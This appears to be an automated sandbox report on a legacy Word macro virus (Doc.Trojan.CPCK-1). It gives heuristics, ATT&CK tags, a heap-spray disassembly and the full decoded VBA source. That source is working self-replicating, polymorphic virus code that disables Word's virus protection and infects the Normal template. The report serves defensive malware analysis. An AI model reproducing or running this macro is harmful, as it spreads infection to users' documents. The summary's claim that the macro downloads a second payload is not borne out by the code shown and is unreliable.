MALICIOUS
156
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically triggering AutoOpen and Auto_Close events. Heuristics indicate a heap spray pattern and legacy WordBasic auto-exec markers, suggesting an attempt to exploit vulnerabilities or execute arbitrary code. The VBA script, though truncated, appears to be designed to download and execute a secondary payload, as indicated by the presence of macro code and the 'CLAMAV_DETECTION: Doc.Trojan.CPCK-1' signature.
Heuristics 6
-
ClamAV: Doc.Trojan.CPCK-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.CPCK-1
-
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x04 bytes found
Disassembly
Attempted x86 opcode disassembly0000299E 0404 add al, 4 000029A0 0404 add al, 4 000029A2 0404 add al, 4 000029A4 0404 add al, 4 000029A6 0404 add al, 4 000029A8 0404 add al, 4 000029AA 0404 add al, 4 000029AC 0404 add al, 4 000029AE 0404 add al, 4 000029B0 0404 add al, 4 000029B2 0404 add al, 4 000029B4 0404 add al, 4 000029B6 0404 add al, 4 000029B8 0404 add al, 4 000029BA 0404 add al, 4 000029BC 0404 add al, 4 000029BE 0404 add al, 4 000029C0 0404 add al, 4 000029C2 0404 add al, 4 000029C4 0404 add al, 4 000029C6 0404 add al, 4 000029C8 0404 add al, 4 000029CA 0404 add al, 4 000029CC 0404 add al, 4 000029CE 0404 add al, 4 000029D0 0404 add al, 4 000029D2 0404 add al, 4 000029D4 0404 add al, 4 000029D6 0404 add al, 4 000029D8 0404 add al, 4 000029DA 0404 add al, 4 000029DC 0404 add al, 4 000029DE 0404 add al, 4 000029E0 0404 add al, 4 000029E2 0404 add al, 4 000029E4 0404 add al, 4 000029E6 0404 add al, 4 000029E8 0404 add al, 4 000029EA 0404 add al, 4 000029EC 0404 add al, 4 000029EE 0404 add al, 4 000029F0 0404 add al, 4 000029F2 0404 add al, 4 000029F4 0404 add al, 4 000029F6 0404 add al, 4 000029F8 0404 add al, 4 000029FA 0404 add al, 4 000029FC 0404 add al, 4
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() C = LnGGi + AjRPz + JhRIe + TyUIo + QyNKt + NlFGh + SnVUv + PeFLx + VlAMx + R -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
A = ThJKs + FiLLm + BkFBt + VsOHr + HvEJm + FkMNy + D ON67.CodeModule.replaceline 1, "Sub AutoClose()" S = InGSg + LrAFw + OeGFg + CnNNk + C
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4604 bytes |
SHA-256: 1cb211b5dcb05a2cc74149183e88e1e57f4ec1f71538d5fcb1a7f034462ab77f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
C = LnGGi + AjRPz + JhRIe + TyUIo + QyNKt + NlFGh + SnVUv + PeFLx + VlAMx + R
On Error Resume Next
K = BtIGf + VrGDw + OqJPs + NvEMy + T
Options.ConfirmConversions = 0
H = RrGUm + NqCMk + UhALf + JlLLp + I
AC46 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
Q = BuVBr + IpDKu + NoDUl + LrCRp + N
Options.VirusProtection = 0
E = AvBCs + CzLOo + SyEOq + HwPUo + BjIKp + EsCMw + UxJGg + QtOFy + AsRGu + KuHAp + T
Options.SaveNormalPrompt = 0
R = QfHLy + NqVCf + NsDKv + VxAHn + UoISh + OkVHp + JkDJo + L
LO45 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
C = LuNKl + TrGGw + LvMHg + KvPQm + RwREe + ByRIp + C
Application.EnableCancelKey = 0
J = BkLMv + KjQIg + QyNPz + I
If LO45 > 0 And AC46 > 0 Then GoTo QE79
E = ViPJj + GsJUx + OsCEy + JeLKe + I
If LO45 = 0 Then
O = GoDLe + MfOJk + BjPKw + EsRBo + QiHVi + T
Set ON67 = ActiveDocument.VBProject.VBComponents.Item(1)
P = JxURk + IzDDo + IxGOh + KvTIs + QvJFg + NrISn + UoHTu + FwHAj + StPIi + QqBJs + G
LN41 = True
E = DmVFf + CeNNg + MuSBq + QuIIo + FnEBg + ClTFf + SqKQh + IvHJw + NxEPo + V
End If
M = AqGQg + SwCAw + IvVTn + QwFAh + RiHJn + RnEEr + H
If AC46 = 0 Then
O = JnBMv + VfVSq + ReFDk + AsPCx + GrMGt + RtIIh + JkOIf + L
Set ON67 = NormalTemplate.VBProject.VBComponents.Item(1)
L = MjKTt + OgGIz + GeQMm + FoRSx + J
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines, "' ****** " & Application.UserName & " was infected " & Now & vbCr
E = JkKIf + VmLNy + G
LO45 = LO45 + 2
L = DqMMi + ArBGm + N
CF84 = True
U = UjMJj + DyFQf + HkRAi + KvNTf + OzOVz + B
End If
P = MiABn + GqLQq + HyIMj + MlRJi + P
If CF84 = True Then
C = EiBFf + SvEFf + FuPOi + QtSPg + EsMHv + MmDBm + SlJEp + VjIKn + OzOTs + J
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\try"
G = HqQJk + LwGBe + GmGSs + RwGBp + JmAHx + HjNVh + MmETs + NmQPk + QuMLn + J
ON67.CodeModule.AddFromFile ("c:\try")
S = VoMKz + IwODv + IxNPq + JsPEz + TzKQj + E
ON67.CodeModule.deletelines 1, 4
A = ThJKs + FiLLm + BkFBt + VsOHr + HvEJm + FkMNy + D
ON67.CodeModule.replaceline 1, "Sub AutoClose()"
S = InGSg + LrAFw + OeGFg + CnNNk + C
ElseIf LN41 = True Then
I = SuOIh + JhEQg + EeVTo + OpDOm + SrBLy + J
ON67.CodeModule.AddFromFile ("c:\try")
U = VzONo + AkGVt + IsHFm + PuMMe + F
ON67.CodeModule.deletelines 1, 4
D = QrNKp + CeDMl + ClQRq + BpMBq + CwGVm + GqKBp + JfGDo + HoIFy + OrMTq + NrBCw + Q
End If
M = DzPSo + ReLBm + HtPIr + EgDIm + Q
With ON67.CodeModule
T = HzRUt + EfEJs + HeMLx + A
For x = 2 To (ON67.CodeModule.CountOfLines - 1) Step 2
Q = PuUKk + IuNMp + OjBDx + BnVEs + TpFSy + CeSSe + FlNVq + BgDFm + IoUMe + I
For y = 1 To (Int(Rnd * 10) + 2)
T = MqBAs + JrNDq + DeGBi + PuRTe + FpUUo + TnJSk + TwROf + SiRKj + MwGKg + I
PF10 = PF10 + (Chr(65 + Int(Rnd * 22))) & (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(122 - Int(Rnd * 22))) & " + "
B = LeJRt + BgMSi + QfBSu + GyTVu + LsEEx + NnSBv + NpGSt + VrRRm + HnOMy + SyDGq + JhBTu + R
Next y
U = ClFSv + EoNNx + I
.replaceline x, (Chr(65 + Int(Rnd * 22))) & " = " & PF10 & (Chr(65 + Int(Rnd * 22)))
B = AgKIf + FnARp + MrDQv + EsJQx + JhMQt + N
PF10 = ""
T = PsNDg + IiDKz + QhGJo + AlVCi + AeVPk + DwVPg + CwFAs + F
Next x
H = SySRv + CmBNp + UvGNu + GxAVj + JpKSq + PrIFu + BiSHq + VkKSs + DgLRm + V
End With
K = GvRTx + TmTQs + LhDRq + LyBSe + AlUCr + T
If Month(Now) = 1 And Day(Now) = 1 Then MsgBox "I think " & Application.UserName & " is a big stupid jerk!"
Q = SlEBf + KlBAe + EgJDt + S
QE79:
D = HgSJm + EfFAs + NrOQk + EyFEe + O
If AC46 <> 0 And LO45 = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
N = FuQQr + DnCFh + OpMFz + FfBSy + PuUBm + KgJSh + BnLRq + VwOPj + KeSDl + GgQIx + NxOGy + M
' ****** Ditry PC was infected 1/20/99 5:20:20 PM
O = SfEDk + RsSRr + MrLKn + RsFTu + DwFDo + VrGOu + PsBUt + V
' ****** Ditry PC was infected 4/22/99 4:42:07 PM
R = IpPFg + RpCEu + VzHPt + GwHKf + AjBNk + I
' ****** Avert was infected 5/11/99 3:06:32 PM
I = DfHBt + OwTDq + UpVJj + PvDOe + RnIGj + FkNEe + RlBKx + OiKAo + NhGGm + L
' ****** OPEY A. was infected 13.6.1999 13:12:45
B = OwPUj + UwGPu + UfSTv + UxRQf + KgDKr + NzHQy + FySEi + ViKPt + H
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.